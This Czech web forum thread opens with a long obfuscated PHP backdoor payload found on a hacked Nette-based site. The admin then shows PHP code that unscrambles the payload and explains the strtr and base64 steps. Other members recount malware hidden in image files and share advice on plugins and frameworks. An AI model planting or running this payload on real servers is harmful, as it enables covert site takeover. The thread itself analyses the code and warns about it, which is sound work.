W2wIzF0nJYulJYulJYulJYulJYulJYulJYulJYulioXTWYlTzF0nJYulJYulJYulJYulJYulJYulJYS9fKelJYulJYulJYulJYulJYulHBwLN2w7fKelJYulJYulJYulJYulJYulJYulJOwdgO8lprqbU250JRA0ZBqkshpdU2qyNdTciBKIsbW6U3SkUISaUcSkZOkrWRGXsY9bU250sdqINd4tCIEeWREFCIN6Cc8tCIEHQ0whwvwhBcWJwVEKo0XsQ1Ktoh4ICcJapO1XNOETNI4tCcNapRXjUO5XUBQ7fKelJYulJYulJYulJYulJYulJYulJYE3iBJlshuvgRE0NV93iBJapreyCcNapOWyW2wICINyN2k0iB1XNY5FgRu/iOV0ix0tCIETiY4tptEkUou9pc4vWOwjNY4tptWkPd0tCIEeU3A0CINbZO1LshNapOE0CINbUBVFWRkFix0tCIEjPoS0ZoSkCINbgRE0Nf0tCIEeWREFzF0nJYulJYulJYulJYulJYulJYulJYSkP2XyJYJ8PtJ+JI4vW2wIzF0nJYulJYulJYulJYulJYulJYulJYSkZOk0nYv7fKelJYulJYulJYulJYulJYulHK0nJYulJYulJYulJYulHK0nJYulJYulJYulJYulgBPeib9FiB4epO1XNOETNI4tCcNapRXjUO5XUBQLJYp3JIvTZF0nJYulJYulJYulJYulJYulJYE4UBFlshS0NbkjnRAjU3w0iO8epRWkPIvTzF0nJYulJYulJYulJYulJYulJOkbnRA0NbkrWRJepRXjUYFtUb8lP3pkPoKlUBVFpcvTZF0nJYulJYulJYulJYulJYulJYulJYSkP2XyJYN8ib9aWYSrWRkLix0IP29LU3J6NbwvJd5aUcSdNbwXWYSjPouXsY9bU250sIN7fKelJYulJYulJYulJYulJYulJYulJOw4goK7fKelJYulJYulJYulJYulJYulHK0nJYulJYulJYulJYulJYulJYEjZBiTUOQlshSbU3SkUIlvUBVFiOkcCINypc4vZO1LUbVjihFlJtNInxLAYIulJYulJYulJYulJYulJYSbW3pTWOQepO15ibkLihFlpRXjUYv7fKelJYulJYulJYulJYulJYulibALU3AknYEjZBiTUOQTzF0nJYulJYulJYulJYulJYulJOwdgO8lJb9MsOpcsIJapOX0WRuaJdeyCcJapV9xEwpBEwpUp0XQwVSHhD9xwYWWCIJyJI4vUBVFiOkcCINypc4vZO1LUbVjixLAYIulJYulJYulJYulJYulJYSkP2XyJYJ8PtJ+JI4vW2wIzF0nJYulJYulJYulJYulJYulJOw4goKenxLAYIulJYulJYulJYulJR1kURAkZF0nJYulJYulJYulJYulJYulJOidUO9rihlvUokbgBqknxLAYIulJYulJYulJYulJYulJYSkP2XyJYN8ib9aWYSrWRkLix0IP29LU3J6NbwvJd5dNbwXWYSrgoEkUBVFJOiXgBqkJD5yJVSkNb1TN3ATU25rJxFyib9aWf48PtJ+gRE0NfeyCcNapV9xEwpBEwpUp0XQwVSHhD9xwYWWCIJyJI4vUBVFiOkcCINypc4vZO1LUbVjixLAYIulJYulJYulJYulJYulJYSkP2XyJYJ8PtJ+JI4vW2wIzF0nJYulJYulJYulJYulJYulJOw4goKenxLAYIulJYulJYulJYulJR0AYIulJYulJYulHBwLN2w7fKelJYulJYulJYulJYSTiIXbU3SkUIlvZO1LUbVjihFlJtNInhk7fKelJYulJYulJYulJYulJYulpRXjUYu9JREcgB0eN21yWoEvUclvW2wInhv7fKelJYulJYulJYulJYulJYulgBPeN3EcgoA0NIlvZO1LCYWaUcSdNbwXWYSjPoutnhk7fKelJYulJYulJYulJYulJYulJYulJOwdgO8lprqbU250JRA0ZBqkshpdU2qyNdTciBKIsb5yJOAciBV0JO1XNYD8C2iyUtK+prLAYIulJYulJYulJYulJYulJYulJYulioXTWfLAYIulJYulJYulJYulJYulJYS9fKelJYulJYulJYulJYulJYulpO15ibkLihu9JOiyNOwanYE4UBqaPB1kCYuIWcJTzF0nJYulJYulJYulJYulJYulJOi3Nbk0ihlvUokbgBqkCYuvZO1LnxLAYIulJYulJYulJYulJYulJYSbP2qyN2QepO15ibkLihv7fKelJYulJYulJYulJYulJYuliBAeUcuIU2L8PtJ+JI4vgRE0NY4IzI8yJI4vo1AVQkiVQkLthVEQQV9Jx1AQp10aJI8ICIE4UBqaPB1kzF0nJYulJYulJYulJYulJYulJOwdgO8lJdqINd4ICIE3iBJ7fKelJYulJYulJYulJYulJYulioXTWYlTzF0nJYulJYulJYulJYulHBwLN2w7fKelJYulJYulJYulJYulJYulibALU3AknYEjZBiTUOQTzF0nJYulJYulJYulJYulJYulJOwdgO8lprqbU250JRA0ZBqkshpdU2qyNdTciBKIsbAciBV0JRATWOwjPoulibVTUOQlxb8lQOwcUBkrN2kyUtGXsY9bU250sdqINd4tCIEeWREFCIN6Cc8tCIEHQ0whwvwhBcWJwVEKo0XsQ1Ktoh4ICcJapRXjUO5XUBQ7fKelJYulJYulJYulJYulJYuliBAeUcuIsOpcsIJapRWkPdLAYIulJYulJYulJYulJYulJYSkZOk0nYv7fKelJYulJYulJYulJYS9fKelJYulJYulJR0AYIulJYS9fKelJYulgBPepOkvnoLAYIulJYulJYulKOXkPBEkNIlIK29aWOwaWY10ZoSkzIS0ioX0C2X0UBF7JOAePoprioK9WoEbCxlInxLAYIulJYulJYulpRWkPIu9JYEeWREFo3WkPI4tzI8ypc4vi293iBJapc9TUbEkZY5FgRu/WopLshNapRATWOQapciTif0tCIETiY4tptEkUou9pc4vWOwjNY4tpbE0shNapOE0CINbW2wIshNapOXyN3Kapci6Zd0tCtAjgoAIU3Kenh4tpbALU2AMshNapOALU2AMCINbWopTshNapRAjWopTCINbWopLN2XXUbN9pc4vWopLN2XXUbNapcieWREFshNapOX0WRu7fKelJYulJYulJYEeWO1Lo2AyUtEkUtKlshS0NbkjnRAjU3w0iO8epRWkPIvTzF0nJYulJYulJYSTiIlXN3EcN3EcnYEeWO1Lo2AyUtEkUtKLp25yPb90WoAkNbVtiB50pcvTZF0nJYulJYulJYulJYulgBPeN3EcN3EcnYEeWO1Lo2AyUtEkUtKLp29MgREjUOWkWOAyUtEkUtKtnhk7fKelJYulJYulJYulJYulJYulpOX0UBqHP29aWOwaWYu9JRA0Nk9cioSLPBAknYpyg2X0UBqtioEdU250iB50JIFtpcFvgREjUV9dU250iB50nxLAYIulJYulJYulJYulJYulJYSkP2XyJYEeWO1Lo2AyUtEkUtK7fKelJYulJYulJYulJYulJYulioXTWYlTzF0nJYulJYulJYulJYulHBwLN2QlgBPeN3EcN3EcnYEeWO1Lo2AyUtEkUtKLp2WkWOAyUtEkUtK1GfSFPBWkpcvTZF0nJYulJYulJYulJYulJYulJDSeiBVvioJep0XQwVuyGh4qJfQFGYSpUtEkNb5XUYSxiop2ioJlEopcU3JtnxLAYIulJYulJYulJYulJYulJYSkZOk0nYv7fKelJYulJYulJYulJYS9iBqrihSTiIXrWRprWRJepOX0UBqHP29aWOwaWYFti2w0P29aWOwaWfKFARSXi2Qtnhk7fKelJYulJYulJYulJYulJYulKOXkPBEkNIlthVEQQY8qCdDlAfu0JD5yWYSOU3waiYNTzF0nJYulJYulJYulJYulJYulJOw4goKenxLAYIulJYulJYulJYulJR0AYIulJYulJYulHK0nJYulJR0AYt1kURAkZF0nfKelJYulpRWkPIu9JYEeWREFo3WkPI4tzI8ypc4vi293iBJapc9TUbEkZY5FgRu/WopLshNapRATWOQapciTif0tCIETiY4tptEkUou9pc4vWOwjNY4tpbE0shNapOE0CINbW2wIshNapOXyN3Kapci6Zd0tCtAjgoAIU3Kenh4tpbALU2AMshNapOALU2AMCINbWopTshNapRAjWopTCINbWopLN2XXUbN9pc4vWopLN2XXUbNapcieWREFshNapOX0WRu7fKelJYulpOX0UBqHP29aWOwaWYu9JREcgB0eN21yWoEvUclvW2wInhv7fKelJYulgBPeJoA0NtA0NIlvgREjUV9dU250iB50CYWaU2pyWRwriopXi2waWYNTnoLAYIulJYulJYulKOXkPBEkNIlIK29aWOwaWY10ZoSkzIS0ioX0C2X0UBF7JOAePoprioK9WoEbCxlInxLAYIulJYulJYulgBPeN3EcN3EcnYEeWO1Lo2AyUtEkUtKLp29MgREjUOWkWOAyUtEkUtKtnhk7fKelJYulJYulJYulJYuvgREjUV9dU250iB50Jf0lN3Eco3pkNOqXP2QeJb9MgREjUOWkWOAyUtEkUtKICYNtCYEeWO1Lo2AyUtEkUtKTzF0nJYulJYulJYulJYuliBAeUcuvgREjUV9dU250iB50zF0nJYulJYulJYulJYulioXTWYlTzF0nJYulJYulJYS9iBqrihSTiIXrWRprWRJepOX0UBqHP29aWOwaWYFti2w0P29aWOwaWfQFGRSXi2Qtnhk7fKelJYulJYulJYulJYSugOwXiOwcnYWJwVEKCrDaGhu1GfulhB50iopaPBFlQ2wcWbwcJDwcNb9cpcv7fKelJYulJYulJYulJYSkZOk0nYv7fKelJYulJYulJR1kURAkJOkbnRA0NtA0NIlvgREjUV9dU250iB50CYWtioEdU250iB50Afu0NOVtihNTnoLAYIulJYulJYulJYulJDSeiBVvioJep0XQwVuyGh4qJfKFAYSzU3KlEb91UbKtnxLAYIulJYulJYulJYulJOw4goKenxLAYIulJYulJYulHBwLN2QlgBPeN3EcN3EcnYEeWO1Lo2AyUtEkUtKLp2WkWOAyUtEkUtKrGfVFPBWkpcvTZF0nJYulJYulJYulJYulKOXkPBEkNIlthVEQQY8qCdDlGruqJD1yWbwvJVSkNb1XUbwaWOq5pcv7fKelJYulJYulJYulJYuvgREjUV9dU250iB50Jf0lN3Eco3pkNOqXP2QeJbWkWOAyUtEkUtKrGfVFPBWkJIFtpcFvgREjUV9dU250iB50nxLAYIulJYulJYulJYulJOXkPBEkNIltxO9dPoETU246JYNapOX0UBqHP29aWOwaWYv7fKelJYulJYulJYulJYSkZOk0nYv7fKelJYulJYulJR0AYl0nJYulJR0AYt0AYl0nitwaP3ETU24lN21TN2pyWYlTJRLAYIulJYuvPBWkUtKlshSrWRp0U2qyW2wcnYEHQ0whwvwhBcWJwVEKo1wxEwpHKQWVxkKtohv7fKelJYulgBPlnYEXi2waWYuXshuIJIvlZF0nJYulJYulJYuvi29yi2qkKb90Jf0lPopcPoveJvWyU2WLiBpyWYJLJkkXgO9yJhSxURwcNYJLJkkXgO9yJVALWopFJIFIE29yi2qkJDVvQ2waN2QICYWtU29tUOQtCYutZBVeU28tnxLAYIulJYulJYulib9ciBVdgYuepOWyU2WLiQpyWYSXNcuvWbVLnhS7fKelJYulJYulJYulJYuvN3EcJf0lN3EcWO9LU3WkNIlvWbVLnxLAYIulJYulJYulJYulJOkbJYXrWRpFU3GepOVtiB50CYuvN3EcnhvlZF0nJYulJYulJYulJYulJYulJRpkWRwcUIS0NtwkzF0nJYulJYulJYulJYulHK0nJYulJYulJYS9fKelJYulHBwLN2w7fKelJYulJYulJRpkWRwcUISbPBqrixLAYIulJYS9fKT9fKTbWB5dWOkyUISrUB90gOwcPb90nYvlZF0nJYulJYEXi2waWYu9JRA0NtEyUO93ioJepV9xEwpBEwpUp0XQwVSHwwAVQk9SE0wzwYWWnxLAYIulJYSTiIuepOVtiB50JYD9JYJInhS7fKelJYulJYulJYErNOkviopxgoEkJf0lPopcPovlnYpQiB5diB50wRpXWbwLioJICYpjN25IU3KICYpxU3AyN3STiOwcncJLJkAyi291JRWkPISrNOkvioJICYpTPw9XNbAegoikNIJLJkkyWBEXU0pyWYJLJv1xxvpyWYJLJvTXWbDlnD9bWOwaJRAFPB0lPb90nhJLJvpXgQE1Q3STiOwcJIFIwb9TUODICYpiPB5viollPb90JIFIKkAFgBEkNIJLJtE3gBAkUOwcJIFIQ29tU3QlQ3STiOwcJIFIQ3SkiBE5JVAFgBEkNIJLJvXkNbk0Nbk4JIFIQRk0gO9aCowcUOqTPIJLJvVLioXXJYXpKhSSNbAegoikNIvICYpSN2LICYpVZOVIU3KICYpfWoA0UcJLJv91WOiyZDpyWY9iU2EXU0pyWYJLJtkXP3vICYpxWop2iokYU3KICYpLiBWrJIFIURWFCoEcgoiTPBFICYpzWoEdgYJLJkA0PBAMQbVjPbqkNIJLJkEeihS3iBJlPopdgOk2ihuehQDlKopdgOk2ioJTJIFIQOwcUYS0U29LJIFIxQeqGbpyWYJLJv5kWOAcPBi0JIFIxwApEQAcPoWLioJICYpoE2w0JREyU2qrJIFIUOVcPbkaJIFIEbkrgYSriBVcP2lICYutPbkai2pyWYNLJYWIPBkvWhNLJYWXU2FtCYutPbkaicNLJYWiPB5vioXYU3KtCYutKBXciBirKb90pcv7fKelJYulJYulJOiyNbwXP2llnYErNOkviopxgoEkJOVrJYE2PBFTJRLAYIulJYulJYulJYulJYErWRJlshSrWRp0U2qyW2wcnYE2PBFTzF0nJYulJYulJYulJYulgBPlnRA0NtSyNclvPBWkUtKLJYErWRJTnhS7fKelJYulJYulJYulJYulJYulNbw0WopaJREcWBQ7fKelJYulJYulJYulJYS9fKelJYulJYulJR0AYIulJYS9iBqrioLAYIulJYulJYulNbw0WopaJOiXURAkzF0nJYulJR0AYt0AYbi1UbA0gB9aJRAjU3w0iO8epRwcUYk7fKelJYulpOiTUOwHP29aWOwaWRGlshSuibkLiw9tioEHP29aWOwaWRGepRwcUYv7fKelJYulgBPlnYDvibkLiw9dU250iB50NcvlZF0nJYulJYulJYuvP2llshSdWopLo2kagoKenxLAYIulJYulJYulP3wcUV9rioEyNRKepOAeCYSfwwpGx1SQo1whxYFlpRwcUYv7fKelJYulJYulJOA1NbqHN2w0U3S0nYEdgYFlK1whxD9KwV9hEwEwQv5QQvVzQ0iVQIFqnxLAYIulJYulJYulpOiTUOwHP29aWOwaWRGlshSdWopLo2w4iBGepOAenxLAYIulJYulJYulP3wcUV9dUO9rihlvP2lTzF0nJYulJR0AYIulJYScioE1Nb4lpOiTUOwHP29aWOwaWRG7fKT9fKTbWB5dWOkyUISLgoA0EOkcnYEvgoJTZF0nJYulJYEbgBqkPopcJf0lPopcPovenxLAYIulJYSTiIXTN19vgoJepOETNIvTZF0nJYulJYulJYSTiIuepOEeJf0lU3SkUbETNIlviOkcnhk7fKelJYulJYulJYulJYS3gOkLihuenYEbgBqkJf0lNbwXiOETNIlviOlTnhuXsx0libVLN2QTZF0nJYulJYulJYulJYulJYulJOkbnYXbgBqko2w4goA0NclviOkcCIJyJI4vibkLihvTJYPbJYEbgBqkJx0ICIJlpIPlpOiTUOQXshJaCIJTZF0nJYulJYulJYulJYulJYulJYulJYuvibkLiBVcNkjWJf0lpOiTUOQ7fKelJYulJYulJYulJYulJYulHK0nJYulJYulJYulJYulHK0nJYulJYulJYulJYulP2qyN2wvgoJepOEenxLAYIulJYulJYulHK0nJYulJR0AYIulJYScioE1Nb4lpOiTUOwXNtJ7fKT9fKe/sl==";

//$O00O0O($O0OO00($OO0O00($O0O000,$OO0000*2),$OO0O00($O0O000,$OO0000,$OO0000),$OO0O00($O0O000,0,$OO0000))))
echo $O00O0O."(";
echo $O0OO00."(";
echo $OO0O00."(,";
//echo $O0O000.",";
echo ($OO0000*2)."),";
echo $OO0O00."(,";
//echo $O0O000.",";
echo $OO0000.",";
echo $OO0000.")";
echo $OO0O00."(,0,";
//echo $O0O000.",0,";
echo $OO0000."))))";

echo "\n\n";

echo $OO0O00($O0O000,$OO0000*2)."\n\n";
echo $OO0O00($O0O000,$OO0000,$OO0000)."\n\n";
echo $OO0O00($O0O000,0,$OO0000);

Ve výsledku je tento rozbalovač postavený takto:

base64_decode(strtr(substr($2nd_enkrypt,104),substr($2nd_enkrypt,52,52)substr($2nd_enkrypt,0,52))))

Já jsem si na indexu říkal, proč skládá do proměnné i znaky "52" a takto je proměnná využita ve druhém rozbalení jako odrozjebnutí rozjebaného base64 enkryptu (kvůli týpkům, podobným nám, snažící se to rozluštit jen pomocí base64 dekodéru - který jim díky rozjebnutí vyflusne tak leda hovno)

Zásadní je zde funkce strtr (https://www.php.net/manual/en/function.strtr.php) - proháže znaky v enkryptu. Samotný base64 enkrypt začíná až na 105 znaku, prvních 104 znaků je maska pro strtr funkci k přeházení písmen.

Sdílet tento příspěvek


Link to post
Share on other sites

A proto nechci mít nic společného s weby, které mají i jen malé procento wordpressu. Uživatel si stáhne bezhlavě plugin a vlastně ani neví, co v něm je. Pak jen píše, že jeho web je nefunkční, a že já bych to měl řešit, haha.

Ale abych nehanil jen wordpress, týká se to všech webů, které mají v CMS možnosti instalovat pluginy třetích stran.


Řešil jsem problém minulý rok, kdy jsem udělal web na MODX (CMS) a klientka mi po 2 letech napsala, že celý obsah webu je v čínských znacích.
– byl to pravděpodobně nějaký malware zatáhnutý nějakým botem skrze nějakou díru v CMS. Musel se udělat dump z DB a pak komplet CMS přeinstalovat a nahrát dump znovu + template a images. 

Oser to byl veliký a od té doby klientům radši doporučuji, že jim udělám prostředí na míru, které potřebují na správu webu, bez dalších blbostí, které by stejně nevyužili a jen narušovali přehlednost toho, co oni potřebují k používání.

Sdílet tento příspěvek


Link to post
Share on other sites
Moderátor

Něco podobného se mi stalo pár let zpět. Kód byl také v base64 a importován do stránky jako neco.jpg, jenže jpg obsahoval base64 zabalenej php kod. Už si nepamatuju jaký web, ani jak se tam dostal, ale dejte pozor i na nové soubory, jako třeba obrázky co nejsou obrázky. Hodně často je to přesně jak tady píšeš, používání proměnných 0 a O aby to vypadalo jako něco strašně důležitého. 

Sdílet tento příspěvek


Link to post
Share on other sites
Moderátor

Chápu tedy, že web jel na Nette, který měl tuto bezpečnostní chybu? Jinak docela zajímavá zadní vrátka. O to víc, že se o Nette ví někde v zahraničí, když se jedná prakticky jen o český framework.

Sdílet tento příspěvek


Link to post
Share on other sites
Admin
Author of the topic Odesláno:

Jojo, web je stavěný na starší verzi Nette - dělala to nějaká random firma kdysi dávno, já jen převzal údržbu. Je to celkem strašidelně napsaný a nedá se do toho pořádně sáhnout aniž by se něco neposralo.. Web se jim povedlo prolomit znova, nicméně to už byla jiná díra (přes basic PHP vyráběné API pro program na dotazování informací z DB), která jela snad 10 let netknutá :D

Sdílet tento příspěvek


Link to post
Share on other sites
před 20 hodinami, ATomas said:

O duvod vic vepouzivat Nette :D

S tím úplně nesouhlasím. Už jen to, že Nette nepatří mezi největší frameworky je důvodem, že pro některé hackery není tolik atraktivní. Co se týče různých zneužitelných chyb, tak tím bouhužel trpí každý kus softwaru, i když se o dané chybě ještě neví. Nette se pořád aktivně vyvíjí a chyba byla opravena. K jejímu zneužití začalo docházet až potom, co byla vydána oprava (i pro starší verze, které už nebyly oficiálně podporovány) a vývojáři mely před zveřejněním této chyby čas na aktualizaci (samozřejmě ne všichni věděli, že mají aktualizovat). Každopádně podle mě se k tomu vývojáři Nette postavili naprosto ukázkově.

Sdílet tento příspěvek


Link to post
Share on other sites
On 1. 11. 2020 at 21:25, Labi said:

S tím úplně nesouhlasím. Už jen to, že Nette nepatří mezi největší frameworky je důvodem, že pro některé hackery není tolik atraktivní. Co se týče různých zneužitelných chyb, tak tím bouhužel trpí každý kus softwaru, i když se o dané chybě ještě neví. Nette se pořád aktivně vyvíjí a chyba byla opravena. K jejímu zneužití začalo docházet až potom, co byla vydána oprava (i pro starší verze, které už nebyly oficiálně podporovány) a vývojáři mely před zveřejněním této chyby čas na aktualizaci (samozřejmě ne všichni věděli, že mají aktualizovat). Každopádně podle mě se k tomu vývojáři Nette postavili naprosto ukázkově.

To byla z me strany provokace :)

O nette jsem se zajimal pouze jdnou a jako jediny framework maji u me respekt s tim ze kdyz prijdu na jeji hl stranku ze tam pisou

"

Opravdoví programátoři

nepoužívají frameworky

"

Tim to pro me konci a uz ani nepotrebuju pokracovat ve cteni. Ale aspon jako jediny to tam maji napsany, takze REP+ :D

Edited by ATomas

Sdílet tento příspěvek


Link to post
Share on other sites
Moderátor
před 7 hodinami, ATomas said:

Opravdoví programátoři

nepoužívají frameworky

Moment. Takže když to vezmu všeobecně, tak Angular, React, Vue.js, Spring, Hybernate, .Net, Node se nepoužívají "opravdovými" programátory? :D Sorry, ale tohle co jsi napsal je totální blbost podle mě. 

Sdílet tento příspěvek


Link to post
Share on other sites
On 6. 11. 2020 at 9:56, Hip said:

Moment. Takže když to vezmu všeobecně, tak Angular, React, Vue.js, Spring, Hybernate, .Net, Node se nepoužívají "opravdovými" programátory? :D Sorry, ale tohle co jsi napsal je totální blbost podle mě. 

Ano presne tak jak rikas :D

Sdílet tento příspěvek


Link to post
Share on other sites

Naco pouzivat kod, znalosti a skusenosti ostatnych programatorov, ktory s tym robia dlhe roky a na zaklde svojich skusenosti vyprodukovali nieco, co mi ma ulahcit pracu a zvysit kvalitu kodu. :kappa: Programovanie je iba if, while, memcpy().

Sdílet tento příspěvek


Link to post
Share on other sites
před 4 hodinami, Jiu said:

Naco pouzivat kod, znalosti a skusenosti ostatnych programatorov, ktory s tym robia dlhe roky a na zaklde svojich skusenosti vyprodukovali nieco, co mi ma ulahcit pracu a zvysit kvalitu kodu. :kappa: Programovanie je iba if, while, memcpy().

Ta myslenka je trochu jina. pouzivat znalosti jinych programatoru je ok, ale zkoumat jejich kod a logiky ktere pouzili a inspirovat se jimi. s tim jsem ok. vzit jejich knihovnu a zacit ji pouzivat bez znalosti fungovani jadra, to neni nic pro me. Dalsi vec co me stve kdyz uz treba nasadis ten nette tak je to proste platforma navic ktera se spis muze vysrat / updatovat. Pri migracich na dalsi svry opet dalsi pakarna s instalaci a zprovoznovani dalsi veci.

Dal ivec je ze kdyz uz ti framework neco zjednoduzsi na druhou stranu ti dost veci i zkomplikuje. A cim vice user friendly vec tim horsi a omezenejsi na pouzivani. Konkretne takonej .NET to je peklo, ale co uz stejne za 10 let nebude podporovany a vyda se neco jinyho, jako treba asp a aspx konci podpora atp :D

Samozrejme nekdy je clovek okolnosti tlacen pouzit neco co je proti jemu presvedceni, treba MS SQL kdyz proste tem firmam clovek nevysvetli ze linux je na servererch standart a ne oni si budou platit windows licence musi to kazdy mesic restartovat kvuli updatum a tim si doserou connexe k db. Pak tam mrdnes IIS misto apache a jeste tam doinstalovavas ms sql knihovny aby to cely jelo. Predstava tam mrdnout jeste nette tak uz se jdu asi objesit :D :D :D

Sdílet tento příspěvek


Link to post
Share on other sites
Moderátor
před 3 hodinami, ATomas said:

Ta myslenka je trochu jina. pouzivat znalosti jinych programatoru je ok, ale zkoumat jejich kod a logiky ktere pouzili a inspirovat se jimi. s tim jsem ok. vzit jejich knihovnu a zacit ji pouzivat bez znalosti fungovani jadra, to neni nic pro me. Dalsi vec co me stve kdyz uz treba nasadis ten nette tak je to proste platforma navic ktera se spis muze vysrat / updatovat. Pri migracich na dalsi svry opet dalsi pakarna s instalaci a zprovoznovani dalsi veci.

Dal ivec je ze kdyz uz ti framework neco zjednoduzsi na druhou stranu ti dost veci i zkomplikuje. A cim vice user friendly vec tim horsi a omezenejsi na pouzivani. Konkretne takonej .NET to je peklo, ale co uz stejne za 10 let nebude podporovany a vyda se neco jinyho, jako treba asp a aspx konci podpora atp :D

Samozrejme nekdy je clovek okolnosti tlacen pouzit neco co je proti jemu presvedceni, treba MS SQL kdyz proste tem firmam clovek nevysvetli ze linux je na servererch standart a ne oni si budou platit windows licence musi to kazdy mesic restartovat kvuli updatum a tim si doserou connexe k db. Pak tam mrdnes IIS misto apache a jeste tam doinstalovavas ms sql knihovny aby to cely jelo. Predstava tam mrdnout jeste nette tak uz se jdu asi objesit :D :D :D

No hele, já ti nevím... To že windows na server nepatří, s tím souhlasím :D php je všeobecně peklo, ale prohlásit, že knihovny jsou k ničemu, to as není uplně něco na čem se shodneme. Konec konců, svým způsobem i SAMP běží na "knihovně" RakNet. Jestli nemáš rád knihovny, tak si udělej vlastní server, který umí komunikovat se stávajícím klientem. Nevím jak ti to jinak vysvětlit, že používat knihovny je normální. Pokud ti nevyhovují knihovny, tak to rovnou můžeš dělat vše v Assembleru. Pojď udělat statickou stránku v assembleru, nebo program, co vykreslí písmenko... :D 

Sdílet tento příspěvek


Link to post
Share on other sites
před 4 hodinami, ATomas said:

Ta myslenka je trochu jina. pouzivat znalosti jinych programatoru je ok, ale zkoumat jejich kod a logiky ktere pouzili a inspirovat se jimi. s tim jsem ok. vzit jejich knihovnu a zacit ji pouzivat bez znalosti fungovani jadra, to neni nic pro me. Dalsi vec co me stve kdyz uz treba nasadis ten nette tak je to proste platforma navic ktera se spis muze vysrat / updatovat. Pri migracich na dalsi svry opet dalsi pakarna s instalaci a zprovoznovani dalsi veci.

Dal ivec je ze kdyz uz ti framework neco zjednoduzsi na druhou stranu ti dost veci i zkomplikuje. A cim vice user friendly vec tim horsi a omezenejsi na pouzivani. Konkretne takonej .NET to je peklo, ale co uz stejne za 10 let nebude podporovany a vyda se neco jinyho, jako treba asp a aspx konci podpora atp :D

Samozrejme nekdy je clovek okolnosti tlacen pouzit neco co je proti jemu presvedceni, treba MS SQL kdyz proste tem firmam clovek nevysvetli ze linux je na servererch standart a ne oni si budou platit windows licence musi to kazdy mesic restartovat kvuli updatum a tim si doserou connexe k db. Pak tam mrdnes IIS misto apache a jeste tam doinstalovavas ms sql knihovny aby to cely jelo. Predstava tam mrdnout jeste nette tak uz se jdu asi objesit :D :D :D

Jako nedokazem si predstavit, ze by som mal v dnesnej dobe programovat vsetko sam a od nuly.  Zabijes neskutocne kvantum casu programovanim niecoho, co uz davno existuje.

Napr. chcem si spravit webovu appku. Nepouzijem angular, ale napisem si podobny framework od nuly. Zabijem tym kvantum casu; bude mat hafo bugov a bezpecnostnych dier a co tym dosiahnem? Nic.
Pride mi jednoduhsie si odladit jeden framework, u ktoreho dostavas updaty a nove featury zdarma.

Zober si napr. taky login/register system. Nahodis na kubernetes Keycloak, do angularu natiahnes keycloak-js a keycloak-angular baliky a asi cez 5 riadkov mas vsetko vyriesene. Ak to chces riesit sam, tak musis napisat vlastny server, pripojenie s DB, nastudovat si problematiku autorizacie a autentifikacie, riesit access token, refresh token, revoke, grant access, CORS policy, generovanie ceritifikatov, podpisovanie a pod. Jedna jedina chyba a hned tam mas nejakeho hackera. Takto ti staci si precitat zaklady, ako funguje Keycloak a nemusis riesit veci, ako to, ako v JS overit podpis toho a toho certifikatu alebo ako spravne pouzit pseudonahodny generator cisiel na vygenerovanie dostatocne silneho RSA privatneho kluca.

Sdílet tento příspěvek


Link to post
Share on other sites
Admin
Author of the topic Odesláno:

Pánové, přidám i svůj názor na téma frameworků :D

Z praxe vím, že je to celé jen o výsledné kvalitě a zároveň o částce, kterou za výsledek dostanete.. ATomas nemá pravdu v tom, že programátor by neměl používat frameworky, naopak by měl. Ale zároveň musí rozumět tomu, co se děje pod pokličkou těchto frameworků.. Je to něco jako být mechanik a opravovat auta jen podle manuálu - opravíš to, ale ve skutečnosti nemáš tucha proč se to vysralo, jak tomu předcházet a co jsi vlastně udělal pro to, aby to zase jelo.

Programátor samozřejmě musí znát problematiku, které se věnuje, musí se v ní orientovat, mít pojem o celé syntetice kódu. Využití frameworku ve výsledku mnohonásobně urychlí práci a ušetří peníze buď klientovi, nebo přinese víc peněz programátorovi. Navíc mainstream framework testuje tisíce lidí dnes a denně, to je číslo, které ti žádný klient nezaplatí. Testují ho whitehat i blackhat inženýři, další prachy, které nikdo do klasického vývoje jen tak nevrazí. Vyvíjí ho tým profesionálů, kteří jsou ve VĚTŠINĚ případů za to ještě placeni (granty, příspěvky od firem, či programátorů, kteří jejich framework využívají). Proto si troufám tvrdit, že v dnešní době je používání frameworku nejen DOBRÝ nápad, DOBRÝ zvyk a zaběhnutá praxe, ale dává to i mnohem větší smysl, než neustále dokola stavět základy tam, kde už jich několik postaveno bylo :) 

A zakončím to klasickým tvrzením: Víc hlav, víc ví. (A těch hlav se okolo frameworků motá neskutečné množství :) )

Sdílet tento příspěvek


Link to post
Share on other sites

Konecne se ta diskuze taky trochu rozjela :D

 

Ja bohuzel vetsinu lidi co jsem potkal a delali s frameworkama, neumeli ani zaklady toho s cim pracuji. Dokonce jsem potkal typka co jako ze dela v nette ale neposkladal formular v html :D

Jedna vec je ze ses okolnostmi donucen pouzit neco (jako vsampu treba RakNet, protoze vetsina lidi pouziva client a muj vlastni by nepouzivala). A dalsi vec je pouzivat nejakou knihovnu jen ciste pro lenost. To je to s cim nesouhlasim. Tihle lidi pak ani nevedi jak to funguje a znaji jen tu knihovnu a nemaji paru o tom jak to cele funguje. Pak prijde nejaky hacker a zkoumas jak nekde nekdo neco udelal (myslim koder, ne hacker :) )

Edited by ATomas

Sdílet tento příspěvek


Link to post
Share on other sites
Moderátor

Tak já teda beru jako základ, že člověk, co dělá s frameworkem, tak ví co se jinak děje, do jisté míry. Ale pořád je tam ta hranice, kde Java je ještě Javou a pak přechází v procesorové příkazy. Chápeme se ne?

Sdílet tento příspěvek


Link to post
Share on other sites
před 7 hodinami, Hip said:

Tak já teda beru jako základ, že člověk, co dělá s frameworkem, tak ví co se jinak děje, do jisté míry. Ale pořád je tam ta hranice, kde Java je ještě Javou a pak přechází v procesorové příkazy. Chápeme se ne?

Jasny, ja mam bohuzel jen ty zkusenosti s lidma co absolutn netusili a pak jsem po nich musel ten bordel uklizet. Takl jsem si k tomu vytvoril odpor...

Sdílet tento příspěvek


Link to post
Share on other sites
před 40 minutami, ATomas said:

Jasny, ja mam bohuzel jen ty zkusenosti s lidma co absolutn netusili a pak jsem po nich musel ten bordel uklizet. Takl jsem si k tomu vytvoril odpor...

Ale to je problem ludi, nie frameworkov. Zas netreba byt konzervativny a hned si robit nazory z jedneho, dvoch pripadov. Ak robis weby, tak skus sa pohrat napr. s Angularom 10, uvidis, ze sa to vyplati.

Sdílet tento příspěvek


Link to post
Share on other sites
před 2 hodinami, Jiu said:

Ale to je problem ludi, nie frameworkov. Zas netreba byt konzervativny a hned si robit nazory z jedneho, dvoch pripadov. Ak robis weby, tak skus sa pohrat napr. s Angularom 10, uvidis, ze sa to vyplati.

